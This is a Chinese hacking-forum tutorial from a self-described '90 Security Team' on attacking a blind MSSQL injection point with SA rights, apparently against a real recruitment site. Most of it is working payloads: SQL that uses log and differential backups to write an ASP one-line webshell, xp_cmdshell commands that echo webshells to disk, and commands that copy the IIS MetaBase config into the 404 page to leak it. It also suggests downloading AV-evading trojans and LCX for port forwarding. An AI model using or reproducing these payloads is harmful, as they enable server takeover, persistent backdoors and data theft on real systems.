sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————


                                                             欢迎高手访问指导，欢迎新手朋友交流学习。
4 ^% F3 u3 u/ l% |# _; V( y
                                                                 
                                                                 
                                                                  论坛： http://www.90team.net/

1 e" t2 [, _5 i
: o# k& Z4 s* h6 F
$ }- t. g+ |2 h- j- y5 H友情检测国家人才网


内容：MSSQL注入SA权限不显错模式下的入侵
7 F+ l- B: q' Y

一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。
7 {$ G* j! J2 V9 R; I4 W* ?
$ p; K5 B% l9 w: B我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。


这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
/ V8 b1 Y; [0 \
8 e" s4 h- n) U: Y; g; Z思路：
' y5 M* s7 a" u3 U$ u* e) t' P8 y
) S3 o. p7 {; m2 o  M; L首先：
0 f9 V* p# f; Q9 i& E% A
3 H7 m3 q0 S+ @4 y" I3 I3 ^通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。

1.日志备份获得Webshell

: m4 L$ @# y( E9 L7 {$ K2.数据库差异备份获得Webshell
9 ?0 N$ _' n6 s2 a" Y) H, y- s' ^
2 g4 ~' G/ w+ }; w/ J- [4.直接下载免杀远控木马。
1 U) u. L6 w! Q
4 `9 W: U2 {; v. j9 J. @! ^) e! P5.直接下载LCX将服务器端口转发出来
% N$ c$ C5 o3 N: c# F
7 j+ B# j, m3 X6 X6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。


4 j4 [: q( n+ O2 @- I
, H5 R) [& J: D! B3 U) H2 a% x在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
$ ~! [1 c$ E% _* |5 J; O3 O: H
我直接演示后面一个方法
7 G5 w5 ~( v7 c$ u' G6 y" a

分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
3 I' R4 g6 B% h% U7 R. s
/ H, j! h& e) s+ ~% Z) F1 ]  l
: N, C* I; Q! `% ~! }2 B5 o! d; y

  X/ s9 u# P6 q/ m" R0 d3 P+ v◆日志备份：

3 u' n' R& ?9 Q2 @* ?
1. 进行初始备份
1 ^6 ~. o& I- n# ~; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
7 e+ r3 m  D+ P. ?& g# c( X
2. 插入数据
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
/ w+ s* O4 b! U3 J; v% f
/ a1 U) w* J/ j, O6 N; R/ C% b0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
$ |  q+ F3 c4 z3 s4 f. Q) H  
3. 备份并获得文件，删除临时表
* R9 _+ E, J* J; w5 w6 b/ ?+ D;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--

" ?2 l3 j) L  e: H/ }. L  m, w

◆数据库差异备份

, o7 B- m* s- o$ Z8 z* h2 S( a) \. @（1. 进行差异备份准备工作

1 q! Z! `! W: r* {6 U/ E;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--

# \0 ]8 e7 ]# L0 y) z6 t上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
' k0 j, J# y9 ~! I
! f# n* @6 p5 G& [- r
（2. 将数据写入到数据库
$ c4 p* s% V, x# S* a. v1 S# A* x6 s;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>

3. 备份数据库并清理临时文件

6 [2 s$ K- ~* W( ^;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--

* C: b) v8 R4 g* ?/ _0x633A5C746573742E617370  为 c:\test.asp  删除临时文件


0 x- X: D/ z; P! S2 N& E7 f; S( F: E
, O7 ]" `: F' e, M用^转义字符来写ASP(一句话木马)文件的方法:   
$ P8 Y5 c5 |; T( ~
& u6 b7 z4 F# _5 ?  l1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--

! Z6 R* s, u( w3 _2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
5 {3 J5 u# O$ Z$ C/ V3 w, N
读取IIS配置信息获取web路径
5 l0 B" t/ B4 [5 J$ T; }$ B3 Y6 H
     
# t. r5 Z% I! y1 u5 g2 ]3 m     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

执行命令
9 t; X) ?9 g) Q2 b/ G# H8 z  R1 o     
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
3 J+ J- n4 b/ B2 M+ J
$ _& s" f/ U0 c; q: W

& T! T4 h5 A! k1 J0 \3 r

* P6 S* x- F$ r5 Z0 w# w
: u7 m1 J6 q5 ?7 k6 w  Y
6 ~. v+ M6 K0 W
6 B; K( X6 W# C# W3 q0 w

$ c9 J# @; f1 ^: P3 v
' J% e8 L$ \. P; w/ u; X
7 ]; v- R! f4 G9 m9 [- B7 B
( r2 \- R6 j. b3 m; _+ O( K
' n9 G, o" t. w
7 z; H/ T% a% r7 r+ B1 E
& C/ q8 i0 W8 i' O
0 T, @2 V" s5 Y4 |
# _6 G2 N7 F2 U) w4 G
7 N6 H* _1 U' ?2 I/ n' x

* {% E# d! I6 F" ~: F- N


  q8 N' g" C9 m( t! f0 \* t

/ ~) z; L+ H. @& Z0 U) i7 [


4 \% s8 c6 O! t4 I( u1 @


. H) z4 O7 M3 r9 @. Z+ Z0 E
1 ]1 b1 U3 \$ c/ {+ C, F& q3 o

5 c( `, ^/ ?& Z" |  S% d! x+ F




' c6 e- q& y6 j) q+ Z+ f( `





: w. f3 i: L- D9 j' n

' s. }9 T1 ^& _/ o' K; H0 f% H+ {